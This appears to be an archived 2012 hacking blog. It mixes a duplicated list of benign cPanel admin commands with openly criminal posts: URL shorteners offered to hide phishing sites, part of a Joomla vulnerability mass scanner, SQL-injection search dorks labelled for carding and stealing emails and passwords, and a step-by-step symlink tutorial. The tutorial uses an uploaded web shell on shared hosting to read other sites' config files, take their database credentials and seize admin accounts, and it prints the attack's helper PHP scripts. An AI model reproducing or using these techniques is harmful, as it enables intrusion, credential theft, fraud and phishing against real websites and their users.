Wednesday 29 August 2012
Tuesday 28 August 2012
cPanel Commands to run in SSH
NOTE: Those who think this is not a use, there might be someone out there who might like these
These are some basic cPanel Commands that should be run in SSH for the required task. Its a very handy list for web hosters and so I suggest you all to bookmark this page.
Restart chkservd:
/etc/init.d/chkservd restart
Tail Apache log:
tail -f /usr/local/apache/logs/error_log
Updates the cpanel server software:
/scripts/upcp
Reinstalls exim:
/scripts/exim4
View traffic or if you think a site is being DDoS:
cd /usr/local/apache/domlogs
tail -f targetsite.com
Correct bandwidth issues
/scripts/cleanbw
To fix problem in webalizer that stop updating stats
/scripts/fixwebalizer
Fix everything
/scripts/fixcommonproblems
/scripts/fixeverything
Fixing Mail List MailMan
/usr/local/cpanel/bin/convertmailman2
Reinstall MailMan
/scripts/reinstallmailman
/scripts/fixhome
pico /etc/my.cnf
Edit php.ini (may be in a differant place if you have Zend installed)
pico /usr/local/lib/php.ini
Edit Apache Conf
pico /etc/httpd/conf/httpd.conf
Checking Real Time Top Processes Login to SSH and run
top
Run cpanel backup
/scripts/cpbackup
To try and fix domain controller
/scripts/fixndc
Quotas
/scripts/initquotas - takes a while to run
/scripts/resetquotas
/scripts/fixquotas - takes a while to run
Add a Dns Entry
/scripts/adddns
Install Frontpage Mail Exts
/scripts/addfpmail
Add JavaServlets to an account (jsp plugin required)
/scripts/addservlets
Add a User
/scripts/adduser
Run WHM Lite
/scripts/admin
Add Rlimits (cpu and mem limits) to apache
/scripts/apachelimits
Resync with a master DNS Server
/scripts/dnstransfer
Edit A User’s Quota
/scripts/editquota
Search For Trojans in /dev
/scripts/finddev
Locate Trojan Horses
/scripts/findtrojans
Suggest Usage
/scripts/findtrojans > /var/log/trojans
/scripts/fixtrojans /var/log/trojans
Make Interchange work with suexec
/scripts/fixcartwithsuexec
Fix Most Problems with Interchange
/scripts/fixinterchange
Run on a trojans horse file created by findtrojans to remove them
/scripts/fixtrojans
Run this if a user’s stats stop working
/scripts/fixwebalizer
Fix a broken valias file
/scripts/fixvaliases
Turn on DMA and 32bit IDE hard drive access (once per boot)
/scripts/hdparamify
Re-scan quotas. Usually fixes Disk space display problems
/scripts/initquotas
Turn on SUEXEC (probably a bad idea)
/scripts/initsuexec
Display Ipusage Report
/scripts/ipusage
Terminate an Account
/scripts/killacct
Delete “Security Problem Infested RPMS”
/scripts/killbadrpms
Fix Various Mail Permission Problems
/scripts/mailperm
Attempt to Troubleshoot a Mail Problem
/scripts/mailtroubleshoot
Change a Mysql Password
/scripts/mysqlpasswd
Kill Potential Security Problem Services
/scripts/quicksecure
Rebuild Ip Address Pool
/scripts/rebuildippool
Delete Nasty SSL entry in apache default httpd.conf
/scripts/remdefssl
Restart a Service (valid services: httpd,proftpd,exim,sshd,cppop,bind,mysql)
/scripts/restartsrv?? (example: /scripts/restartsrv httpd)
Syncup Security Updates from RedHat/Mandrake
/scripts/rpmup
Force a webalizer/analog update
/scripts/runlogsnow
Remove non-important suid binaries
/scripts/secureit
Install Frontpage 4+ on an account
/scripts/setupfp4
Return a Simple process list. Useful for finding where cgi scripts are running from
/scripts/simpleps
Suspend an account
/scripts/suspendacct
Syncup Cpanel RPM Updates
/scripts/sysup
Unblock an IP
/scripts/unblockip
UnSuspend an account
/scripts/unsuspendacct
Update Cpanel
/scripts/upcp
Update /scripts
/scripts/updatenow
Create a New Account
/scripts/wwwacct
Awstats to run manually
/scripts/runweblogs account_username
License Not working
rdate -s rdate.darkorb.net
Sometimes such behavior of apache/httpd (taking more and more memory until it dies or crashes the server) can be caused by corrupted MySQL database. Try to do the following:
1) Kill the mysql server
/etc/rc.d/init.d/mysql stop
2) Repair all SQL databases:
myisamchk -r /var/lib/mysql/*/*.MYI
3) Start mysql again:
/etc/rc.d/init.d/mysql start
——————————————————————————-
Restarting cpanel
/etc/rc.d/init.d/cpanel restart
To run your clients stats now
/scripts/runlogsnow
Restart the background proccess that runs the stats for your clients
/usr/local/cpanel/startup
To run your clients stats now
/scripts/runstatsonce
To run one clients stats:
/scripts/runweblogsnow username
Shut down http
httpd stop
Start http with SSL
httpd startssl
Start http
httpd start
__________________________________________________ ___
IF YOU LIKE MY POST, A "THANKS" IS REALLY APPRECIATED
These are some basic cPanel Commands that should be run in SSH for the required task. Its a very handy list for web hosters and so I suggest you all to bookmark this page.
Restart chkservd:
/etc/init.d/chkservd restart
Tail Apache log:
tail -f /usr/local/apache/logs/error_log
Updates the cpanel server software:
/scripts/upcp
Reinstalls exim:
/scripts/exim4
View traffic or if you think a site is being DDoS:
cd /usr/local/apache/domlogs
tail -f targetsite.com
Correct bandwidth issues
/scripts/cleanbw
To fix problem in webalizer that stop updating stats
/scripts/fixwebalizer
Fix everything
/scripts/fixcommonproblems
/scripts/fixeverything
Fixing Mail List MailMan
/usr/local/cpanel/bin/convertmailman2
Reinstall MailMan
/scripts/reinstallmailman
/scripts/fixhome
pico /etc/my.cnf
Edit php.ini (may be in a differant place if you have Zend installed)
pico /usr/local/lib/php.ini
Edit Apache Conf
pico /etc/httpd/conf/httpd.conf
Checking Real Time Top Processes Login to SSH and run
top
Run cpanel backup
/scripts/cpbackup
To try and fix domain controller
/scripts/fixndc
Quotas
/scripts/initquotas - takes a while to run
/scripts/resetquotas
/scripts/fixquotas - takes a while to run
Add a Dns Entry
/scripts/adddns
Install Frontpage Mail Exts
/scripts/addfpmail
Add JavaServlets to an account (jsp plugin required)
/scripts/addservlets
Add a User
/scripts/adduser
Run WHM Lite
/scripts/admin
Add Rlimits (cpu and mem limits) to apache
/scripts/apachelimits
Resync with a master DNS Server
/scripts/dnstransfer
Edit A User’s Quota
/scripts/editquota
Search For Trojans in /dev
/scripts/finddev
Locate Trojan Horses
/scripts/findtrojans
Suggest Usage
/scripts/findtrojans > /var/log/trojans
/scripts/fixtrojans /var/log/trojans
Make Interchange work with suexec
/scripts/fixcartwithsuexec
Fix Most Problems with Interchange
/scripts/fixinterchange
Run on a trojans horse file created by findtrojans to remove them
/scripts/fixtrojans
Run this if a user’s stats stop working
/scripts/fixwebalizer
Fix a broken valias file
/scripts/fixvaliases
Turn on DMA and 32bit IDE hard drive access (once per boot)
/scripts/hdparamify
Re-scan quotas. Usually fixes Disk space display problems
/scripts/initquotas
Turn on SUEXEC (probably a bad idea)
/scripts/initsuexec
Display Ipusage Report
/scripts/ipusage
Terminate an Account
/scripts/killacct
Delete “Security Problem Infested RPMS”
/scripts/killbadrpms
Fix Various Mail Permission Problems
/scripts/mailperm
Attempt to Troubleshoot a Mail Problem
/scripts/mailtroubleshoot
Change a Mysql Password
/scripts/mysqlpasswd
Kill Potential Security Problem Services
/scripts/quicksecure
Rebuild Ip Address Pool
/scripts/rebuildippool
Delete Nasty SSL entry in apache default httpd.conf
/scripts/remdefssl
Restart a Service (valid services: httpd,proftpd,exim,sshd,cppop,bind,mysql)
/scripts/restartsrv?? (example: /scripts/restartsrv httpd)
Syncup Security Updates from RedHat/Mandrake
/scripts/rpmup
Force a webalizer/analog update
/scripts/runlogsnow
Remove non-important suid binaries
/scripts/secureit
Install Frontpage 4+ on an account
/scripts/setupfp4
Return a Simple process list. Useful for finding where cgi scripts are running from
/scripts/simpleps
Suspend an account
/scripts/suspendacct
Syncup Cpanel RPM Updates
/scripts/sysup
Unblock an IP
/scripts/unblockip
UnSuspend an account
/scripts/unsuspendacct
Update Cpanel
/scripts/upcp
Update /scripts
/scripts/updatenow
Create a New Account
/scripts/wwwacct
Awstats to run manually
/scripts/runweblogs account_username
License Not working
rdate -s rdate.darkorb.net
Sometimes such behavior of apache/httpd (taking more and more memory until it dies or crashes the server) can be caused by corrupted MySQL database. Try to do the following:
1) Kill the mysql server
/etc/rc.d/init.d/mysql stop
2) Repair all SQL databases:
myisamchk -r /var/lib/mysql/*/*.MYI
3) Start mysql again:
/etc/rc.d/init.d/mysql start
——————————————————————————-
Restarting cpanel
/etc/rc.d/init.d/cpanel restart
To run your clients stats now
/scripts/runlogsnow
Restart the background proccess that runs the stats for your clients
/usr/local/cpanel/startup
To run your clients stats now
/scripts/runstatsonce
To run one clients stats:
/scripts/runweblogsnow username
Shut down http
httpd stop
Start http with SSL
httpd startssl
Start http
httpd start
__________________________________________________ ___
IF YOU LIKE MY POST, A "THANKS" IS REALLY APPRECIATED
List Short URL Service to hide your phising site!
Very usefull for phisher out there ;)
http://2isp.com
http://tinyurl.com/
http://w3t.org/
http://lix.in/
http://sturly.com/
http://urlprune.com/
http://rarme.com/
http://doiop.com/
http://rapidlayer.in/
http://myref.de/
http://link-protector.com/
http://www.lil-link.com/
http://urlite.com/
http://protect-links.com/
http://snurl.com/
http://lil-links.com/
http://rapidbolt.com/
http://snip-it.com/
enjoy!
http://2isp.com
http://tinyurl.com/
http://w3t.org/
http://lix.in/
http://sturly.com/
http://urlprune.com/
http://rarme.com/
http://doiop.com/
http://rapidlayer.in/
http://myref.de/
http://link-protector.com/
http://www.lil-link.com/
http://urlite.com/
http://protect-links.com/
http://snurl.com/
http://lil-links.com/
http://rapidbolt.com/
http://snip-it.com/
enjoy!
Joomla Mass Scanner
Usage :
Script:
Code:
python joomla-mass.py <site> <options>
[options]
-p/-proxy <host:port> : Add proxy support
-404 : Won't show 404 responses
Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080
Code:
#!usr/bin/python
print"####################################################"
print"# Joomla Mass Scanner Vulnerability #"
print"# Coded By Angel Injection #"
print"# Copyright 2011-2012 #"
print"# http://www.1337day.com , http://www.r00tw0rm.com #"
print"####################################################"
import sys, re, httplib, time, socket
def main(path):
try:
if proxy != 0:
h.putrequest("GET", "http://"+host+"/"+path)
else:
h.putrequest("HEAD", path)
h.putheader("Host", host)
h.endheaders()
status, reason, headers = h.getreply()
return status, reason
except(), msg:
print "Error Occurred:",msg
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) < 2 or len(sys.argv) > 5:
print "\nUsage: python joomla-mass.py <site> <options>"
print "\t[options]"
print "\t -p/-proxy <host:port> : Add proxy support"
print "\t -404 : Won't show 404 responses"
print "Ex: python joomla-mass.py www.test.com -404 -proxy 127.0.0.1:8080\n"
Share Powerfull Dork
Code:
"you have an error in your sql syntax" inurl:/details.php?id=
Code:
"you have an error in your sql syntax" inurl:/events.php?id=
Code:
"you have an error in your sql syntax" inurl:/articles.php?id=
Code:
"you have an error in your sql syntax" inurl:/artist.php?id=
Code:
"you have an error in your sql syntax" inurl:/viewarticle.php?id=
For Making a Carding :-
Code:
"you have an error in your sql syntax" inurl:/products.php?id=
Code:
"you have an error in your sql syntax" inurl:/price.php?id=
Code:
"you have an error in your sql syntax" inurl:/buy.php?id=
Code:
"you have an error in your sql syntax" inurl:/cart.php?id=
To Find Email and Password :-
Code:
"you have an error in your sql syntax" inurl:/member.php?id=
Code:
"you have an error in your sql syntax" inurl:/comments.php?id=
Saturday 25 August 2012
Symlink Full TuT
Hello guy, This is Maher Bro today I will explain how symlinking process goes step by step, in two different methods
#First Method:-
After uploading the shell make a new directory by an option or execute this command:
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
or make it on your PC and upload it.
and this is the code you should put in that file:
as you can see in the following picture the file name is sym, and I'm showing the content of ".htaccess" file
![[Image: kaoknd.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uRII9Iq8n4Yp8x44zGlwTjWNNYIDAGzU6XIGbZTmcka8DAAgCHEvDWQV4C9fHc2ScYXKbzRCo5ZpklpFmu1TcLGNfA0A=s0-d)
Then, execute this command:
and it will look like this:
![[Image: 15g9qx4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXw_zousKmSV-Fa4LQY1l-fbsu07itLFsolGIyyhbil5Z1YFrn9GrXd273EaOTB6zDVQ9vnGHojGEsw6MqE5WF02FGRYM=s0-d)
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
![[Image: 4l6fv.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ugubK5YF3cwih868VksP0pk3DY-WqbNjju1J-W5NBTAVCh6h1TD8O9zGwNg56NFY94WYC9ckEspNpqhlgncPp9EsludZReKWPn-Bk=s0-d)
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html
#Ofcourse replace =>(user) with the target website user.
you will see something like this:
![[Image: mr8mrb.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tu498ZmxmbXACs3p7c_hYMCrlu0V2t4BlSn9WRQhDzgNVvPYSo5hBIFB_YFA3Rqz4J5jNkgktjEmZVihgyMc_gmFqeiQ=s0-d)
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:
so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
![[Image: 14abedw.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucAi25J5uDsYBxCMM60yUWVKo8l1CHzVbAVWX3XTx2lOuffMPNgKvD-CuxOY0Cn1IYM-1nFm4ZPZ_iH7Ep-XvlA9buEA=s0-d)
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
![[Image: 14jnjfl.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sxmzlSFJ9OzqBp19uvBfdyFxcZ_ViiAb62XdapIPXmRVkW014g5-D66-94WVHJMbWRKOozKsXjaGZvEHa-zRhxhwJJtfg=s0-d)
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
#Finally symlink the target website with this command:
http://www.victim.com/sym/
and you should see something like this:
![[Image: 14v192q.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_veNw62r3n_YlmGcYb2FyFmFaAPD5LNOW0lQytA_OhtH4CnAufiMxuqvEEQw6ReNy5AwcMEhF-QWPUqBw-eW1TMVprxGM4=s0-d)
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
hope you liked it!
User.php
Sql.php
#First Method:-
After uploading the shell make a new directory by an option or execute this command:
Quote:mkdir symthat will make a directory with the name "sym"
then enter the directory you made, then make a file and call it ".htaccess" by running this command:
Quote:touch .htaccessthen put the code inside
or make it on your PC and upload it.
and this is the code you should put in that file:
Code:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy AnyThen, execute this command:
Quote:ln -s / rootso now in our directory "sym" we have the ".htaccess" and something like this [root] (which is a symlink to /root directory)
and it will look like this:
cool guyz? lets carry on..
now go to the website's link and enter your directory from there, for example it might be like this:
http://www.victim.com/sym
hit enter, now you should see something like this:
if it was like the picture above, then you're good to go!
now download "user.php" from the attachments and upload it to your victim's website.
that will show you all the websites on the server along side with their users.
ok, now pick up any site's user and lets hack it!
after you know the user go to your URL and type this:
http://www.victim.com/sym/root/home/(user)/public_html
#Ofcourse replace =>(user) with the target website user.
you will see something like this:
the user in that picture is "hillock"
now you will be able to browse that site's files.
but, we are looking for a specific file called "config.php" OR "configration.php" or some websites have different name but those are the most commen ones.
here is some famous WebApps with their configeration file location:
Quote:vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php
so after you find the configeration file, you will look for DB user and password, for example the picture below shows a joomla! configration file and I've selected the info we look for:
after that, download sql.php from the attachments and upload it through your shell
then copy those login info from the configration file and sign in in sql.php
when you sign in, it will look something like this:
I'll tell you what to do after that in the end!
=======================================
#second method:-
this method is almost the same, but we don't read the configeration file from the same site, but we symlink it to our victim's site as a .txt file, lets see how to do it!
now for this method you don't need to symlink /root directory, but you will symlink the target website's public_html
now lets see the steps,
#First make a directory (just like /sym/ directory in the first method)
#Second make ".htaccess" file but with this code:
Code:
Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .phpQuote:ln -s /home/(user)/public_html (user)then enter your directory put the URL like this:
http://www.victim.com/sym/
and you should see something like this:
in this picture the user is "csseipsn"
now click on the user and again you will be able to browse the website's files and look for the configeration file! and then do the same as the first method!
============================
Now what to do in sql.php?
its simple, sql.php give you access to MySQL database and make you able to edit the data.
now just find the admin's table, crack the hash and you will have the password and sign in!
Hmm... the hash didn't crack? no problem, change the admin's email and choose forget password option and they will send you a new password!
and the third way is to change the admin's hash to your hash and sign in
well thats it!
hope you liked it!
User.php
PHP Code:
<?
echo "<title>Priv8 # Domains & Users</title>
<style>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
</style>
<p align=center># Domains & Users</p>
<p align=center>by Priv8 </p>
<center>";
$d0mains = @file("/etc/named.conf");
if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";
foreach($d0mains as $d0main){
if(eregi("zone",$d0main)){
preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();
if(strlen(trim($domains[1][0])) > 2){
$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
}}}
echo "</table>
<p align='center'> Priv8
</p>
";
?>
PHP Code:
<?
/*
* MySQL Web Interface By JIKo
* -------------------------------
* Developed By sNiper_hEx
*/
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($HTTP_SERVER_VARS, EXTR_SKIP);
@extract($HTTP_COOKIE_VARS, EXTR_SKIP);
@extract($HTTP_POST_FILES, EXTR_SKIP);
@extract($HTTP_POST_VARS, EXTR_SKIP);
@extract($HTTP_GET_VARS, EXTR_SKIP);
@extract($HTTP_ENV_VARS, EXTR_SKIP);
}
function logon() {
global $PHP_SELF;
setcookie( "mysql_web_admin_username" );
setcookie( "mysql_web_admin_password" );
setcookie( "mysql_web_admin_hostname" );
echo "<html>\n";
echo "<head>\n";
echo "<title>MySQL New by jiko</title>\n";
echo "</head>\n";
echo "<body>\n";
echo "<table width=100% height=100%><tr><td><center>\n";
echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
echo "<h1>MySQL Web by jiko</h1>\n";
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=logon_submit>\n";
echo "<table cellpadding=5 cellspacing=1>\n";
echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
echo "</table><p>\n";
echo "<input type=submit value='Enter'>\n";
echo "<input type=reset value='Clear'><br>\n";
echo "</form>\n";
echo "</center></td></tr></table>\n";
echo "</center></td></tr></table>\n";
echo "<p><hr width=300>\n";
echo "</center></td></tr></table>\n";
echo "</body>\n";
echo "</html>\n";
}
function logon_submit() {
global $username, $password, $hostname ,$PHP_SELF;
if($hostname =='')
$hostname = 'localhost';
setcookie( "mysql_web_admin_username", $username );
setcookie( "mysql_web_admin_password", $password );
setcookie( "mysql_web_admin_hostname", $hostname );
echo "<html>";
echo "<head>";
echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>";
echo "</head>";
echo "</html>";
}
function echoQueryResult() {
global $queryStr, $errMsg;
if( $errMsg == "" ) $errMsg = "Success";
if( $queryStr != "" ) {
echo "<table cellpadding=5>\n";
echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
echo "</table><p>\n";
}
}
function listDatabases() {
global $mysqlHandle, $PHP_SELF;
echo "<h1>Databases List</h1>\n";
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=createDB>\n";
echo "<input type=text name=dbname>\n";
echo "<input type=submit value='Create Database'>\n";
echo "</form>\n";
echo "<hr>\n";
echo "<table cellspacing=1 cellpadding=5>\n";
$pDB = mysql_list_dbs( $mysqlHandle );
$num = mysql_num_rows( $pDB );
for( $i = 0; $i < $num; $i++ ) {
$dbname = mysql_dbname( $pDB, $i );
echo "<tr>\n";
echo "<td>$dbname</td>\n";
echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Tables</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
echo "</tr>\n";
}
echo "</table>\n";
}
function createDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;
mysql_create_db( $dbname, $mysqlHandle );
listDatabases();
}
function dropDatabase() {
global $mysqlHandle, $dbname, $PHP_SELF;
mysql_drop_db( $dbname, $mysqlHandle );
listDatabases();
}
function listTables() {
global $mysqlHandle, $dbname, $PHP_SELF;
echo "<h1>Tables List</h1>\n";
echo "<p class=location>$dbname</p>\n";
echoQueryResult();
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=createTable>\n";
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=text name=tablename>\n";
echo "<input type=submit value='Create Table'>\n";
echo "</form>\n";
echo "<form action='$PHP_SELF'>\n";
echo "<input type=hidden name=action value=query>\n";
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=text size=120 name=queryStr>\n";
echo "<input type=submit value='Query'>\n";
echo "</form>\n";
echo "<hr>\n";
$pTable = mysql_list_tables( $dbname );
if( $pTable == 0 ) {
$msg = mysql_error();
echo "<h3>Error : $msg</h3><p>\n";
return;
}
$num = mysql_num_rows( $pTable );
echo "<table cellspacing=1 cellpadding=5>\n";
for( $i = 0; $i < $num; $i++ ) {
$tablename = mysql_tablename( $pTable, $i );
echo "<tr>\n";
echo "<td>\n";
echo "$tablename\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
echo "</td>\n";
echo "<td>\n";
echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
echo "</td>\n";
echo "</tr>\n";
}
echo "</table>";
}
function createTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
$queryStr = "CREATE TABLE $tablename ( no INT )";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();
listTables();
}
function dropTable() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
$queryStr = "DROP TABLE $tablename";
mysql_select_db( $dbname, $mysqlHandle );
mysql_query( $queryStr, $mysqlHandle );
$errMsg = mysql_error();
listTables();
}
function viewSchema() {
global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
echo "<h1>Table Schema</h1>\n";
echo "<p class=location>$dbname > $tablename</p>\n";
echoQueryResult();
echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
echo "<hr>\n";
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
echo "<table cellspacing=1 cellpadding=5>\n";
echo "<tr>\n";
echo "<th>Field</th>\n";
echo "<th>Type</th>\n";
echo "<th>Null</th>\n";
echo "<th>Key</th>\n";
echo "<th>Default</th>\n";
echo "<th>Extra</th>\n";
echo "<th colspan=2>Action</th>\n";
echo "</tr>\n";
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
echo "<tr>\n";
echo "<td>".$field["Field"]."</td>\n";
echo "<td>".$field["Type"]."</td>\n";
echo "<td>".$field["Null"]."</td>\n";
echo "<td>".$field["Key"]."</td>\n";
echo "<td>".$field["Default"]."</td>\n";
echo "<td>".$field["Extra"]."</td>\n";
$fieldname = $field["Field"];
echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
echo "</tr>\n";
}
echo "</table>\n";
}
function manageField( $cmd ) {
global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
if( $cmd == "add" )
echo "<h1>Add Field</h1>\n";
else if( $cmd == "edit" ) {
echo "<h1>Edit Field</h1>\n";
$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
$num = mysql_num_rows( $pResult );
for( $i = 0; $i < $num; $i++ ) {
$field = mysql_fetch_array( $pResult );
if( $field["Field"] == $fieldname ) {
$fieldtype = $field["Type"];
$fieldkey = $field["Key"];
$fieldextra = $field["Extra"];
$fieldnull = $field["Null"];
$fielddefault = $field["Default"];
break;
}
}
$type = strtok( $fieldtype, " (,)\n" );
if( strpos( $fieldtype, "(" ) ) {
if( $type == "enum" | $type == "set" ) {
$valuelist = strtok( " ()\n" );
} else {
$M = strtok( " (,)\n" );
if( strpos( $fieldtype, "," ) )
$D = strtok( " (,)\n" );
}
}
}
echo "<p class=location>$dbname > $tablename</p>\n";
echo "<form action=$PHP_SELF>\n";
if( $cmd == "add" )
echo "<input type=hidden name=action value=addField_submit>\n";
else if( $cmd == "edit" ) {
echo "<input type=hidden name=action value=editField_submit>\n";
echo "<input type=hidden name=old_name value=$fieldname>\n";
}
echo "<input type=hidden name=dbname value=$dbname>\n";
echo "<input type=hidden name=tablename value=$tablename>\n";
echo "<h3>Name</h3>\n";
echo "<input type=text name=name value=$fieldname><p>\n";
echo '
<h3>Type</h3>
<font size=2>
* `M\' indicates the maximum display size.<br>
* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
</font>
<table>
<tr>
<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th>binary</th>
</tr>
<tr>
<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
<td align=center>O</td>
<td align=center>O</td>
<td> </td>
<td align=center>O</td>
<td> </td>
</tr>
<tr>
<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
